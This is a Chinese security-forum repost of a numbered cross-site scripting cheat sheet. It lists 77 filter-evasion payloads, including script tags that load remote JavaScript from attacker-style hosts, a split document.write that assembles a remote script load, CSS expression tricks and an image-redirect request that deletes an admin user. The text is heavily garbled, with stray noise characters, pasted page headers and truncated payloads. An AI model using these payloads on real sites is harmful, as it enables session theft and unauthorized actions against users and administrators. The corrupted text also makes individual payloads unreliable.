貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
* U% Q, V+ t$ E(1)普通的XSS JavaScript注入
. J3 @* j9 T1 S<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ E3 x' t1 G \" S(2)IMG标签XSS使用JavaScript命令2 X0 i9 i' S- Y& ?. }
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 `, M7 R! J( R3 ~: u" \; G
(3)IMG标签无分号无引号
5 Y( q- h" O7 E, P: L1 `<IMG SRC=javascript:alert(‘XSS’)>3 D# b* e" G" K8 H- U
(4)IMG标签大小写不敏感
+ g# F5 g& w* _* c<IMG SRC=JaVaScRiPt:alert(‘XSS’)>5 D- R% B& A1 G
(5)HTML编码(必须有分号) Q% P; h8 b( H
<IMG SRC=javascript:alert(“XSS”)>
4 V5 v% Y5 t$ q4 N9 R2 O(6)修正缺陷IMG标签7 ^& @; u8 d1 c( t& d' n% b- v: D
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>4 R6 C$ ~; @' N/ n p
" k8 h' N; H: r5 Y) d
9 r. h# d0 v( Y8 ^) ~(7)formCharCode标签(计算器)
" G# w" A4 h* ?; u& z<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
, u# t' D: B- e(8)UTF-8的Unicode编码(计算器)5 z% \, h) i% O8 }
<IMG SRC=jav..省略..S')>
( }4 |, ]; n3 \) r* }4 A4 B(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ X, \4 N& M% X% c4 ^/ k& m+ c9 F
<IMG SRC=jav..省略..S')>
6 k8 `+ |! r3 a8 h8 H(10)十六进制编码也是没有分号(计算器)
& `+ R4 ~7 F# S/ a" I<IMG SRC=java..省略..XSS')>
. Z! K' ?( { u7 I2 l(11)嵌入式标签,将Javascript分开
; W* H' H' ]( h<IMG SRC=”jav ascript:alert(‘XSS’);”> |. j7 W# |5 r7 h$ G$ ]
(12)嵌入式编码标签,将Javascript分开
' f- j; K9 v3 h% r<IMG SRC=”jav ascript:alert(‘XSS’);”>7 g: Y$ E, `8 L$ g1 }: f* a
(13)嵌入式换行符9 m+ ?' s5 ~( B8 N( i0 i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' T9 I! l: L9 ](14)嵌入式回车1 h$ F; ?. X Z* h' Q) ]
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ `# T! A2 q. t% R0 X) k(15)嵌入式多行注入JavaScript,这是XSS极端的例子
# b0 E, ^2 S& A6 }<IMG SRC=”javascript:alert(‘XSS‘)”>- g/ _( p; l, `2 A: V
(16)解决限制字符(要求同页面)) x+ j; C$ M- a+ o/ H
<script>z=’document.’</script>- z. `; m' b# X9 _. Y
<script>z=z+’write(“‘</script>4 W2 s: \* _. `) m$ |6 ~
<script>z=z+’<script’</script>0 [, z0 a; v$ l
<script>z=z+’ src=ht’</script>/ T' W0 H' V9 v# k. F3 A! M
<script>z=z+’tp://ww’</script>
3 a, D" J& p# H9 n<script>z=z+’w.shell’</script>1 z, g$ n1 Z4 U' g* E
<script>z=z+’.net/1.’</script>( T& n; g1 Y" W7 i3 {: C v
<script>z=z+’js></sc’</script>9 U* D/ K8 y. o5 ?) K
<script>z=z+’ript>”)’</script># N) S$ q0 j! G* \9 L7 d8 a% K
<script>eval_r(z)</script>
s' D4 x* i) U. e# } Y(17)空字符12-7-1 T00LS - Powered by Discuz! Board1 w. r: H* E }$ P, b
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
6 e. I) M, W J% Pperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out0 g F1 u: E) N+ [" B/ \
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
; K. {) p, s' o. Gperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out4 u) g' V& j7 J% p! l) {* H
(19)Spaces和meta前的IMG标签$ |. k; ~8 H% K9 ]+ a6 O- J, Y h
<IMG SRC=” javascript:alert(‘XSS’);”>
- O% ~$ a: N3 ~: h8 v& p(20)Non-alpha-non-digit XSS3 }6 ]2 B' D4 l9 ~
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 S- K4 W! Y5 d% U: X7 }(21)Non-alpha-non-digit XSS to 2
1 w5 Z4 x$ Y B5 t# _) n! q<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>: k1 x5 \+ E; Q7 K. {+ D4 w
(22)Non-alpha-non-digit XSS to 3: l; [- O# J& E: W1 P- G# L9 |
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* c8 z& d7 r, _ s8 A(23)双开括号
$ ]( L6 r V$ e! |<<SCRIPT>alert(“XSS”);//<</SCRIPT>6 |4 |, g j5 i
(24)无结束脚本标记(仅火狐等浏览器)
4 A7 l- Y+ M: C<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
8 G! h; B5 z A) M J1 q: j(25)无结束脚本标记27 E. Z" A! Z7 o( c! @1 {
<SCRIPT SRC=//3w.org/XSS/xss.js>5 Y* e ?$ f! j- t0 ^4 e# D5 a4 g& ?+ `
(26)半开的HTML/JavaScript XSS
7 X; M1 Y9 z6 o<IMG SRC=”javascript:alert(‘XSS’)”! [7 ~6 O4 r4 Q- S c: G3 Y1 ]
(27)双开角括号4 _8 z# g) ?3 P7 J. T
<iframe src=http://3w.org/XSS.html < }9 {$ R% s5 A. t
(28)无单引号 双引号 分号
3 Q1 D; P! K! |' O8 x/ R<SCRIPT>a=/XSS/
" K1 }6 O7 d4 ralert(a.source)</SCRIPT>2 h6 V* {, c6 f4 k6 q1 K
(29)换码过滤的JavaScript5 u$ G8 X, k7 X0 s T: Z5 [
\”;alert(‘XSS’);//1 ?! Y6 t- \7 ]/ O8 r
(30)结束Title标签; U. }, n7 \, I1 J7 J! m% O# ]$ q
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>" X% h) Y0 q5 w1 U8 `' ~
(31)Input Image
( N' {" d* @- G* t<INPUT SRC=”javascript:alert(‘XSS’);”>/ v. u; S3 _1 Z/ v; W2 ]- }) m7 ?+ M
(32)BODY Image; V: w8 }# R% J9 ?) c
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>0 n' t& |4 V1 Y+ g
(33)BODY标签
, d+ a+ |- H# K<BODY(‘XSS’)>
; h4 K! S5 Z1 H5 e(34)IMG Dynsrc4 G4 `! l7 I5 J4 Q( b( x1 v3 g( K
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
$ e+ O# D; I$ {7 @1 \6 y- o(35)IMG Lowsrc; n8 K9 J- y+ t7 L& u
<IMG LOWSRC=”javascript:alert(‘XSS’)”>) s. `8 h0 ?3 S0 @5 e; q
(36)BGSOUND* E$ p _3 C6 t) v
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
" L5 u; L8 n3 d) e/ Z(37)STYLE sheet" L+ J! k3 \$ \0 r- `) L+ _# o. \
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
" c% R( a9 b0 ~1 b7 w(38)远程样式表
, B, R$ v8 |! b, I; H$ X: ~<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
! l; L) ?9 m8 l4 c* S1 v(39)List-style-image(列表式)
) W( Y/ @( Z. e5 r8 b( I) l<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
+ i$ J) r0 k5 |2 H$ a) u9 a) L! g(40)IMG VBscript
- Q7 C/ t2 i* S. f<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS3 G: o _7 ^/ z. t
(41)META链接url7 f1 W- |; W9 Y( Y
4 W$ N* C& h. L: {3 M h
7 s6 B, F% l7 |<META HTTP-EQUIV=”refresh” CONTENT=”0;; ^. Y$ I/ F! v$ D' l4 _9 v$ e
URL=http://;URL=javascript:alert(‘XSS’);”>9 F2 | F4 a3 m' D, I3 O% Z
(42)Iframe
1 u: X$ U7 Y3 D3 h5 R4 ^; E' S<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>/ `* i8 J7 r; M* a2 M
(43)Frame: o& o! u+ m5 K
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board5 @4 O4 b* ?" M- X# J
https://www.t00ls.net/viewthread ... table&tid=15267 3/60 d+ X- r9 ~1 V9 U7 b6 S3 a* {
(44)Table
8 }* X. P9 Z7 x* T6 }, Q- e<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 f, ~7 s7 P5 A3 d7 F
(45)TD
9 l& o$ p: J, j9 F' K: w<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* u' w! M- W7 Y$ y
(46)DIV background-image
: @4 H0 X$ p p2 h+ f- v<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* Y* i Y- R2 L2 O% U(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-6 k' S. K* Y! U% U
8&13&12288&65279)# y2 H' f. e/ v+ v) ?. l& T2 P
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ [& u" B% u2 r) k(48)DIV expression
0 _: G: k' Y) T$ J2 C4 w<DIV STYLE=”width: expression_r(alert(‘XSS’));”> l5 k0 e) c% F
(49)STYLE属性分拆表达+ L$ L# ~3 y9 h( v7 N5 ~5 w: k4 p
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>/ D; B l, O/ Q8 _
(50)匿名STYLE(组成:开角号和一个字母开头)3 X* I$ E# M7 P r2 A
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>9 N7 Q b* N2 |
(51)STYLE background-image
( h6 B0 U3 d3 S" D<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A+ n2 }. i( }- Q
CLASS=XSS></A>0 e; b0 Q' K7 c: ]: _
(52)IMG STYLE方式
, Q h/ J6 P3 |exppression(alert(“XSS”))’>
1 r5 D! k" X5 I6 N# Y% u2 a9 m(53)STYLE background
% |' \0 ~# S6 }8 r% V4 a<STYLE><STYLE
$ r, h8 U, q6 F4 j2 ztype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>" _2 h/ h/ S5 U! g; j/ g
(54)BASE: d- d3 I! y- K6 [
<BASE HREF=”javascript:alert(‘XSS’);//”>
/ G; m! H4 W" W+ R) B(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS& b" R3 e0 G' w0 c( A+ T8 b: @
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
& y. z7 C) x- G5 L: I# ^. \(56)在flash中使用ActionScrpt可以混进你XSS的代码: [% K) F2 V. k. s% d
a=”get”;
3 k& C3 y3 D" C* `' P( ab=”URL(\”";
3 m/ o0 l7 O4 s" R$ X+ yc=”javascript:”;
# X+ Y' U3 ~# Jd=”alert(‘XSS’);\”)”;3 ^: Z2 y9 N8 R: R8 N; a
eval_r(a+b+c+d);( D6 k2 S" D- n; @" t1 W8 N" n9 B! h
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
* X& ?5 ]/ T/ X' x<HTML xmlns:xss>7 l7 b+ \2 i# q1 U! `1 v
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
- b8 X2 \9 C6 O$ L5 _1 w1 ]* [# H) g<xss:xss>XSS</xss:xss># J2 X" C0 j" n! |2 J
</HTML>. G& d \* ~! |# k' a
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用+ V# m& S0 k! g0 {& G/ P
<SCRIPT SRC=””></SCRIPT>) s! w& R3 k9 x4 w' A" s3 P2 f D
(59)IMG嵌入式命令,可执行任意命令
2 w7 A: V" R8 y4 N9 n9 L<IMG SRC=”http://www.XXX.com/a.php?a=b”>
7 V/ k( j8 m; P: D' W(60)IMG嵌入式命令(a.jpg在同服务器)- c }% _7 U, J. p( a/ a0 J$ z
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser/ }' h: K9 t5 u1 o$ q
(61)绕符号过滤
% {7 R3 f0 D8 u/ u* m) r<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>( m; O) _' M2 e" d& g
(62)
' ]' \; a6 t$ {& `1 f5 l0 N<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. V1 }; A0 `% p(63)8 K( ?( _0 p3 h7 i2 |, e
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>) k) H5 J7 a, R, e' |4 _# C
(64)
/ u2 T: c) ?5 D, X& y/ M<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>/ t) c. H. m( p2 q3 @: v
(65)
! U9 c! G! j1 B* l. {4 [, \<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
3 n6 S6 V3 ]; [1 Y: o% P(66)12-7-1 T00LS - Powered by Discuz! Board
/ l! n* Y0 [; H$ z, y( Phttps://www.t00ls.net/viewthread ... table&tid=15267 4/64 T) y, G" A" @/ j; n1 K
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>" T# |3 O* l& A8 d& `. p# u
(67)
" ]% |3 p# T% ]" r- [<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>6 q. \, T* N6 p
</SCRIPT>0 P0 r i- T+ s5 f9 L$ @
(68)URL绕行
7 V2 S0 w$ D8 T8 j<A HREF=”http://127.0.0.1/”>XSS</A>+ v z8 J' j! H' N- W7 i
(69)URL编码
! K$ A, ~( x" |* {<A HREF=”http://3w.org”>XSS</A>
. ~' o& N3 b" Y9 R8 ~(70)IP十进制: h6 g2 B+ W7 ` A1 n1 |7 d
<A HREF=”http://3232235521″>XSS</A>
# B* b' k- n+ ?- I2 i(71)IP十六进制" v( ~! t X' Y
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
" _# R5 _' U m, m* v2 i1 z(72)IP八进制
/ J: y g5 f2 Q% M<A HREF=”http://0300.0250.0000.0001″>XSS</A>
2 G8 E/ s) @1 e0 D! I(73)混合编码% u! K7 U5 N8 p: z$ m! z: _* H) q) b
<A HREF=”h
! k1 L3 @: z; h' i" i# btt p://6 6.000146.0×7.147/”">XSS</A>
: E3 i' R/ A% x(74)节省[http:]9 l j+ T6 I; E& q
<A HREF=”//www.google.com/”>XSS</A>
0 a/ Z( s, ^+ K& |% L: f9 V(75)节省[www]9 E2 R; l( G/ ^/ a
<A HREF=”http://google.com/”>XSS</A>
$ w2 a( h: J& U2 A- u(76)绝对点绝对DNS
' Y' E) \/ q* K4 w7 W' E" [9 R<A HREF=”http://www.google.com./”>XSS</A>
s& B, P- A+ i2 Z(77)javascript链接% J3 P2 J' g) |% Y3 J
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
' w3 W( ]9 s. n4 G7 W# i: x. V8 A$ X6 J& c
原文地址:http://fuzzexp.org/u/0day/?p=141 P; C! N6 g; V+ g9 F: _( P
, ~$ s8 i1 ?5 ~8 c1 ? n
|
发表于 2013-4-19 19:22:37
收藏
支持
反对